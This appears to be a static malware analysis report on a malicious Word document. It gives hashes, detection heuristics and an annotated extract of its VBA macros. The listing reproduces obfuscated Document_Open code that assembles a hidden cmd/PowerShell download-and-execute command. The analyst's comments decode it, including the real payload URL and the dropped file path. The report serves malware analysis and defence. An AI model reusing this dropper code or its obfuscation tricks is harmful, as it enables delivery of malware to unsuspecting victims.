Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b25e368a8bf33319…

MALICIOUS

Office (OLE)

Size: 65.2 KB · Created: 2018-09-07 12:17:00 · Authoring application: Microsoft Office Word · First seen: 2018-10-13
MD5: 87ddc3ec89689eb80ed18b05668c5fff SHA-1: 8aa62182fc4f19b976fb477b95ab8772081bed39 SHA-256: b25e368a8bf33319e0c4b5db1c8a5af79dd11b934a07590c0f7b53d50b593341
Risk score: 182

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-6680503-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6680503-0 (the signature name classifies it as an Office-document downloader, which matches the download-and-execute command line the extracted macro assembles at run time).
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() in Document_open launches a command line that is assembled at run time from the return values of eight helper functions, with window style vbHide (hidden). The command never appears as a single literal, so it has to be decoded from the helpers in macros.bas rather than read off the listing.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open auto-exec handler: the macro runs as soon as the document is opened with macros enabled, with no further user interaction.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the standard OOXML DrawingML namespace URI present in ordinary Office documents; treat it as noise, not an indicator. The macro's actual download URLs are built at run time from caret-escaped, reversed string fragments inside the helper functions, so the static URL extractor does not see them; they must be recovered by decoding the macro.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6368 bytes
SHA-256: d8b73d7156faaaac83e6ee7ebcbb8be6fee073a86f32d77cce1514647b4dcad9
Preview script
First 1,000 lines of the extracted script (the listing reproduced on this page is itself cut off earlier; see "(truncated)" at the end)
Attribute VB_Name = "pOlzJBnj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by olevba. VB_Name is a random-looking
' identifier. VB_Base = "1Normal.ThisDocument" together with
' VB_PredeclaredId / VB_Exposed = True marks this as the document's own
' class module (the "ThisDocument" module), which is where Word looks for
' the Document_Open event handler defined below. VB_TemplateDerived = True
' indicates the document was created from a template (Normal).
' Auto-exec entry point: Word runs Document_Open when the file is opened
' with macros enabled, so everything below fires without further user
' interaction.
Private Sub Document_open()
' "On Error Resume Next" split across line continuations (_) so the
' statement does not match a naive text search. Every error raised in
' this routine is swallowed; the filler statements below depend on that.
On _
Error _
Resume _
Next
   ' Filler: Month(Format(<random literal>)) is evaluated and the value
   ' discarded. A non-date string makes Month raise a type-mismatch error,
   ' which the handler above suppresses. These lines contribute nothing to
   ' the payload; presumably padding/obfuscation to dilute heuristics.
   Month Format("nzjwpKsH" + "50763285")
   Month Format("41794960" + "UtDt")
   Month Format("BnhcaDPXi" + "ThQZW")
   Month Format("1531" + "3197" + "437203224" + "p")
   Month Format("122716515" + "IOkoqqcazt" + "DEzIKIUMuR" + "7471")
   Month Format("bM" + "397" + "c" + "XprIvPoF")
   Month Format("w" + "1256")
' Payload. The command line is built at run time by concatenating the
' return values of eight helpers -- PYirZb, hjZjWhEtKZUQkO, IRMrLqqwFWnV,
' BdlqqjcScoE, aAfWfijpC, jDLtWTikDKH, WkquHkmjrXT, nChMQICjkA -- and
' handed to Shell. Format(vbHide) evaluates to "0" (= vbHide), so the
' spawned window is hidden. Of the helpers, only BdlqqjcScoE is shown in
' full in this preview (aAfWfijpC is cut off); it builds caret-escaped
' cmd.exe syntax, so the full command must be recovered by decoding all
' eight pieces.
Shell Format(PYirZb) + Format(hjZjWhEtKZUQkO) + Format(IRMrLqqwFWnV) + BdlqqjcScoE + aAfWfijpC + jDLtWTikDKH + Format(WkquHkmjrXT) + Format(nChMQICjkA), Format(vbHide)
   ' More filler, same pattern as above.
   Month Format("151282391" + "nijdEQwz" + "RF" + "128903440")
   Month Format("SPHCMhiKpU" + "6031" + "498354437" + "ih")
End Sub



Attribute VB_Name = "OvmkoBU"
' Second module (apparently a standard module: no VB_Base attribute). It
' holds the string-building helpers whose return values Document_open
' concatenates into the Shell command line. BdlqqjcScoE follows in full;
' aAfWfijpC starts further down but is cut off by the preview.
' Helper returning one segment of the command line that Document_open
' passes to Shell. The segment is stored as nine fragments, each built
' from short string literals and Chr() of summed integers, and joined at
' the end. The Month(...) lines are the same no-op filler as in
' Document_open (value discarded, errors suppressed).
'
' Decoding notes (pure arithmetic / string reversal, no guessing):
'   Chr(2 + 11 + 13 + 4 + 69) = Chr(99) = "c"
'   Chr(1 + 7 + 9 + 3 + 47)   = Chr(67) = "C"
'   Chr(0 + 3 + 4 + 1 + 26)   = Chr(34) = double quote
' The ^ characters are cmd.exe escapes; in front of a letter, digit or
' space they are no-ops and only serve to break signature matching.
' Stripping them from the joined return value gives:
'   cmd /V:ON/C"set 7cWF=      }}{hctac};kaerb;qZk$ metI-ekovnI;)qZk$ ,soW$(eliFdaolnwoD.XNI${yrt{)TGO$ ni soW$(hcaerof;'exe.'+pAS$+'\'+cilbup:vne$=qZk$;'282' = pAS$;)'@'(tilpS.'93/ur.nnovokiluk//:ptth@6
' i.e. cmd.exe with delayed variable expansion (/V:ON) assigning a
' variable named 7cWF. Read backwards, that value is the tail of a
' PowerShell snippet:
'   6@http://kulikovonn.ru/39'.Split('@');$SAp = '282';
'   $kZq=$env:public+'\'+$SAp+'.exe';
'   foreach($Wos in $OGT){try{$INX.DownloadFile($Wos, $kZq);Invoke-Item $kZq;break;}catch{}}
' So the payload is a download-and-execute loop over an '@'-separated URL
' list ($OGT), writing to %PUBLIC%\282.exe and launching it, stopping at
' the first URL that works. The head of the snippet (the rest of the URL
' list, the object behind $INX, and whatever reverses the variable and
' launches powershell -- presumably via !7cWF:~n,1!-style delayed
' expansion, not visible here) comes from the other helpers.
Function BdlqqjcScoE()

On _
Error _
Resume _
Next
Month Format("268733694" + "374424021")
' "c" + "md /V^:ON/C" + Chr(34) + "^s^et ^7"  ->  cmd /V:ON/C"set 7
jJbobkHFw = Chr(2 + 11 + 13 + 4 + 69) + "md" + " /V^:O" + "N/" + Chr(1 + 7 + 9 + 3 + 47) + Chr(0 + 3 + 4 + 1 + 26) + "^s" + "^et" + " ^7"
Month Format("birwilf" + "210329392")
   Month Format("NDjGDs" + "KJM" + "22398530" + "t")
   Month Format("V" + "VofPHuwCGkjXrM")
   Month Format("nmKw" + "3363")
' "cW^F=  ^ ^  ^  ^ "  ->  cWF=<spaces>   (completes the name 7cWF)
tVwoP = Chr(2 + 11 + 13 + 4 + 69) + "W^" + "F" + "=  ^" + " " + "^ " + " ^  ^ "
Month Format("410026639" + "CLujU")
   Month Format("SHjA" + "148441006" + "MJ" + "2196")
   Month Format("lrFMsWOkN" + "6602642" + "8365" + "YLMK")
' -> <spaces>}}{hct          (reversed: "tch{{}}" ... i.e. end of catch{})
LjzRsjm = "  ^  " + "^ ^   " + "^ }" + "}^" + "{h" + Chr(2 + 11 + 13 + 4 + 69) + "t^"
Month Format("451358977" + "FVfRrs")
   Month Format("2089" + "6622")
' -> ac};kaerb;qZk$ metI-ekovnI;)   (reversed: ");Invoke-Item $kZq;break;}ca")
YssqGAfcs = "a" + Chr(2 + 11 + 13 + 4 + 69) + "^};k" + "a^er^b;" + "q^Zk" + "^" + "$ " + "^me" + "t^I-" + "^ekov" + "n" + "I;)"
Month Format("7826" + "N" + "GnojtzlvzfL" + "F")
   Month Format("DkIW" + "ckznNs")
   Month Format("9082" + "1899")
   Month Format("JVXv" + "G")
' -> qZk$ ,soW$(eli   (reversed: "ile($Wos, $kZq")
njOhjzfz = "^q^" + "Z" + "^k$^ ,^" + "s^" + "oW$(" + "^el^i"
Month Format("FYWdNpNlQdkKwu" + "9026")
   Month Format("G" + "bzjAlJPwFbi" + "YoA" + "399081206")
   Month Format("W" + "YG" + "uuW" + "Pt")
   Month Format("2097" + "bKkZmXp")
' -> FdaolnwoD.XNI${yrt{)TGO$ ni soW$(hcaerof;'exe
'    (reversed: "exe';foreach($Wos in $OGT){try{$INX.DownloadF")
KYAJJwvwboN = "^F^d^a" + "oln^wo" + "^D.XNI^" + "$^{y" + "r^t{)^T" + "G" + "O$^ n" + "i so^W^" + "$(" + "h" + Chr(2 + 11 + 13 + 4 + 69) + "^a" + "^erof;" + "'e^x^e"
Month Format("popw" + "GZTiIIViUjwjjj")
   Month Format("4217" + "9077" + "313564410" + "5306")
' -> .'+pAS$+'\'+cilbup:vne$=qZk$;'   (reversed: "';$kZq=$env:public+'\'+$SAp+'.")
DOwJmO = "^.'+p^A" + "S^$^" + "+'^\'+" + Chr(2 + 11 + 13 + 4 + 69) + "i" + "l^b^" + "u" + "p:v" + "n^e^$=^" + "q^Zk$" + ";'^"
Month Format("5335" + "5222")
' -> 282' = pAS$;   (reversed: ";$SAp = '282")
sQCLzozSwI = "282'" + "^" + " ^=^ p" + "^A^S$" + "^;"
Month Format("mPHIX" + "Nq")
   Month Format("KwBa" + "rJlo" + "FTF" + "wR")
   Month Format("280131626" + "PiAKrUlihSabR")
   Month Format("h" + "rLu" + "Ia" + "EtLEd")
   Month Format("UjflI" + "349445532")
' -> )'@'(tilpS.'93/ur.nnovokiluk//:ptth@6
'    (reversed: "6@http://kulikovonn.ru/39'.Split('@')" -- the end of the
'    URL list; earlier URLs come from the helper that follows this one in
'    the Shell concatenation)
GrVjzMT = ")'@'(^t" + "^ilpS." + "^'^9" + "^3" + "/^ur^.n" + "n^" + "o" + "v" + "^o^k^" + "i^l" + "u^k//^:" + "^pt" + "t^h@6"
' Join the fragments in order; the function is named after its own return
' variable, as VBA requires.
BdlqqjcScoE = jJbobkHFw + tVwoP + LjzRsjm + YssqGAfcs + njOhjzfz + KYAJJwvwboN + DOwJmO + sQCLzozSwI + GrVjzMT
   Month Format("152377685" + "478189144" + "hjIoQiPD" + "C")
End Function
Function aAfWfijpC()

On _
Error _
Resume _
Next
Month Format("8371" + "pz" + "biFo" + "WrdEnGiw")
   Month Format("olhNiXjJP" + "428608724" + "niMKtsbsiddjj" + "99561868")
   Month Format("NCjfJGu" + "357532045")
   Month Format("MjlA" + "OlBoCfLjC")
ItHkwJbVQ = "/ur" + "^.ika" + "^b-^otv" + "^a//^" + ":p^t" + "^th@^0" + "/^m^o" + Chr(2 + 11 + 13 + 4 + 69) + "^.xu" + "n^i^l" + "m" + "^o//:" + "^ptth@"
Month Format("bQlZnjmjDQmtf" + "aUVjsZvZt" + "362758673" + "G")
   Month Format("zhbRYEL" + "HdnArYVVmXNs" + "GjUl" + "mQKZZ")
   Month Format("qSQn" + "580")
   Month Format("6999" + "hNQTAFFqusX" + "507547001" + "hjp")
   Month Format("5176" + "lG" + "s" + "1724")
lIEoGRrC = "tvpPQ^" + "W^5h" + "/k^s.r^" + "e^ll" + "i^" + "m^-^h" + Chr(2 
... (truncated)